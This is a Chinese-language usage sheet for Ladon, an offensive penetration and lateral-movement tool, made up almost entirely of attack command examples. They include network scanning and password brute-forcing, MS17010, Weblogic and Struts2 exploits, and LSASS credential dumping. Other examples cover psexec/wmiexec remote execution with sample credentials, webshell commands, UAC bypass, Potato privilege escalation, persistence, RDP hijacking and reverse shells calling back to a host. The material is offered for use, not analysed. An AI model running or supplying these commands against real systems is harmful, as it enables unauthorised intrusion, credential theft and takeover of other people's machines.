9.0插件获取:https://mp.weixin.qq.com/s/GQBXCX1fiSLi6gKY3M-JcA
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.2版本内置94个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等,密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
ID | 主题 | URL |
---|---|---|
0 | Ladon完整文档 | https://k8gege.org/Ladon |
New Version:https://k8gege.org/Download
All Version: https://github.com/k8gege/Ladon/releases/
本文仅是Ladon简单使用例子,Cobalt Strike、PowerShell、KaliLadon、L跨平台版等用法一致。
例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping) Ladon noping 10.1.2.8/24 MS17010
详见:http://k8gege.org/Ladon/proxy.html
Ladon 192.168.1.8/24 OnlinePC
Ladon 192.168.1.8/24 OsScan
Ladon 192.168.1.8/24 OnlineIP
Ladon 192.168.1.8/24 Ping
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WebScan
Ladon 192.168.1.8/24 UrlScan
Ladon 192.168.1.8/24 SameWeb
Ladon baidu.com SubDomain
Ladon baidu.com DomainIP Ladon baidu.com HostIP
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
Ladon 192.168.1.8/24 PortScan Ladon 192.168.1.8 PortScan 80,445,3389
Ladon 192.168.1.8/24 WhatCMS
Ladon 192.168.1.8/24 CiscoScan Ladon http://192.168.1.8 CiscoScan
Ladon EnumMssql
Ladon EnumShare
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 FtpScan
密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html
Ladon 192.168.1.8/24 SmbScan
Ladon 192.168.1.8/24 WmiScan
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 WinrmScan.ini
Ladon 192.168.1.8/24 SmbHashScan
Ladon 192.168.1.8/24 WmiHashScan
Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan
Ladon 192.168.1.8/24 MssqlScan
Ladon 192.168.1.8/24 OracleScan
Ladon 192.168.1.8/24 MysqlScan
Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan
Ladon 192.168.1.8/24 VncScan
Ladon 192.168.1.8/24 FtpScan
Ladon 192.168.1.8/24 TomcatScan Ladon http://192.168.1.8:8080/manage TomcatScan
Ladon http://192.168.1.8/login HttpBasicScan
Ladon 192.168.1.8/24 SmbScan.ini
Ladon 192.168.1.8/24 IpcScan.ini
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 WeblogicPoc
Ladon 192.168.1.8/24 PhpStudyPoc
Ladon 192.168.1.8/24 ActivemqPoc
Ladon 192.168.1.8/24 TomcatPoc
Ladon 192.168.1.8/24 WeblogicExp
Ladon 192.168.1.8/24 TomcatExp
Ladon 192.168.1.8/24 Struts2Poc
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
Ladon 123456 EnHex Ladon 313233343536 DeHex
Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64
Ladon FtpSniffer 192.168.1.5
Ladon HTTPSniffer 192.168.1.5
Ladon Sniffer
Ladon IISpwd
Ladon DumpLsass
Ladon EnumProcess Ladon Tasklist
Ladon cmdline Ladon cmdline cmd.exe
Ladon GetInfo Ladon GetInfo2
Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion
Ladon Ver Ladon Version
net user \192.168.1.8 k8gege520 /user:k8gege Ladon psexec 192.168.1.8 psexec> whoami nt authority\system
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
Usage:Ladon JspShell type url pwd cmd Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
Ladon BypassUac c:\1.exe Ladon BypassUac c:\1.bat
Ladon GetSystem cmd.exe Ladon GetSystem cmd.exe explorer
Ladon Runas user pass cmd
Ladon EnableDotNet
Ladon gethtml http://192.168.1.1
Ladon CheckDoor Ladon AutoRun
Ladon GetIP
Ladon WebSer 80 Ladon web 80
Ladon ReverseTcp 192.168.1.8 4444 nc
Ladon ReverseTcp 192.168.1.8 4444 shell
Ladon ReverseTcp 192.168.1.8 4444 meter
Ladon ReverseHttp 192.168.1.8 4444
Ladon ReverseHttps 192.168.1.8 4444
Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh
Ladon PowerCat 192.168.1.8 4444 cmd udp Ladon PowerCat 192.168.1.8 4444 psh udp
Ladon RDPHijack 3 Ladon RDPHijack 3 console
Ladon 192.168.1.8/24 EthScan Ladon 192.168.1.8/24 OxidScan
Ladon Recent
Ladon RegAuto Test c:\123.exe
Ladon at c:\123.exe Ladon at c:\123.exe gui
Ladon sc c:\123.exe Ladon sc c:\123.exe gui Ladon sc c:\123.exe auto ServerName
Ladon ms16135 whoami
Ladon BadPotato cmdline
Ladon SweetPotato cmdline
Ladon whoami
Ladon Open3389
Ladon RdpLog
Ladon QueryAdmin
Ladon ActiveAdmin
Ladon ActiveGuest
Ladon GetPipe
Ladon 192.168.1.8/24 NbtScan